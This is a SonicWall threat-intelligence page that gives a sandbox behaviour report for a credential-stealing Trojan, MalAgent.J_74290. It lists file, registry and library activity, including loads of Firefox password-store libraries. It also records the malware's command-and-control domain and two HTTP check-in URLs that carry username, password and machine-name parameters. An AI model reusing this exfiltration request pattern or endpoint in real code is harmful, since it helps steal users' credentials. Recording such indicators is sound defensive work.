SonicALERT
Search

Sonicwall Signatures

 

Go to All Categories list.


  MalAgent.J_74290
MalAgent.J_74290 is a Trojan. A Trojan is a program that pretends to have a valid use, but in fact modifies the user's computer in malicious ways. Trojans do not replicate or spread to other computers.

Mutexes created
  • Nothing to report


Directory level activity
    • Nothing to report


    File level activity
    • write - file - PIPE\lsarpc
    • write - file - C:\DOCUME~1\TestMachine\LOCALS~1\Temp\S6xTJXmnGA.ini
    • write - file - PIPE\lsarpc


    Registry level activity
    • write - registry - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell FoldersHistory
    • write - registry - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell FoldersAppData
    • write - registry - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell FoldersLocal AppData
    • write - registry - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell FoldersLocal AppData


    Library level activity
    • load - library - C:\DOCUME~1\TestMachine\LOCALS~1\Temp\71d315fc9bf2cc69038d2c82fef11c9e.ENU
    • load - library - C:\DOCUME~1\TestMachine\LOCALS~1\Temp\71d315fc9bf2cc69038d2c82fef11c9e.EN
    • load - library - kernel32.dll
    • load - library - oleaut32.dll
    • load - library - USER32.DLL
    • load - library - C:\DOCUME~1\TestMachine\LOCALS~1\Temp\71d315fc9bf2cc69038d2c82fef11c9e.bin
    • load - library - USER32
    • load - library - comctl32.dll
    • load - library - User32.dll
    • load - library - ole32.dll
    • load - library - kernel32
    • load - library - shell32
    • load - library - user32
    • load - library - C:\caxeieewto\dll\SjWlns.dll
    • load - library - KERNEL32.DLL
    • load - library - ADVAPI32.dll
    • load - library - COMCTL32.dll
    • load - library - comdlg32.dll
    • load - library - GDI32.dll
    • load - library - msvcrt.dll
    • load - library - SHELL32.dll
    • load - library - USER32.dll
    • load - library - VERSION.dll
    • load - library - shell32.dll
    • load - library - advapi32.dll
    • load - library - rsaenh.dll
    • load - library - pstorec.dll
    • load - library - C:\Program Files\Mozilla Firefox\nss3.dll
    • load - library - Kernel32.dll
    • load - library - nss3.dll
    • load - library - C:\Program Files\Mozilla Firefox\softokn3.dll
    • load - library - softokn3.dll
    • load - library - C:\Program Files\Mozilla Firefox\nssdbm3.dll
    • load - library - C:\Program Files\Mozilla Firefox\freebl3.dll
    • load - library - C:\Documents and Settings\TestMachine\Application Data\Mozilla\Firefox\Profiles\6snjkamb.default/nssckbi.dll
    • load - library - C:\Program Files\Mozilla Firefox\mozsqlite3.dll
    • load - library - mscoree.dll
    • load - library - RPCRT4.dll
    • load - library - crypt32.dll
    • load - library - Secur32.dll
    • load - library - mscoree.dll


    Process API calls used
    • NtCreateSection
    • ZwMapViewOfSection
    • NtFreeVirtualMemory
    • CreateProcessInternalW
    • ExitProcess


    Registry API calls used
    • RegOpenKeyExA
    • RegOpenKeyExA


    System API calls used
    • LdrGetDllHandle
    • LdrGetProcedureAddress
    • LdrLoadDll
    • LdrLoadDll


    Filesystem API calls used
      • Nothing to report

      Network

      UDP source >> destination
      • 192.168.30.254 >> 192.168.30.3
      • 192.168.30.3 >> 192.168.30.254
      • 192.168.30.3 >> 192.168.30.255
      • 192.168.30.3 >> 8.8.8.8


      TCP source >> destination
      • 192.168.30.3 >> 192.168.30.254
      • 192.168.30.3 >> 209.99.16.199



      Domains:
      • reiangkor.com with IP - 209.99.16.199

      DNS Request:
      • reiangkor.com

      HTTP Request:
      • GET URI - http://reiangkor.com/cgi-sys/suspendedpage.cgi?action=add&username=&password=&app=&pcname=XPSP3_3&sitename=
      • GET URI - http://reiangkor.com/admin/PHP/index.php?action=add&username=&password=&app=&pcname=XPSP3_3&sitename=

      DLL related data
      Number of DLL's imported = 16
      • kernel32.dll
      • user32.dll
      • advapi32.dll
      • oleaut32.dll
      • kernel32.dll
      • advapi32.dll
      • kernel32.dll
      • version.dll
      • gdi32.dll
      • user32.dll
      • kernel32.dll
      • oleaut32.dll
      • ole32.dll
      • oleaut32.dll
      • comctl32.dll
      • comdlg32.dll


      Relevant Information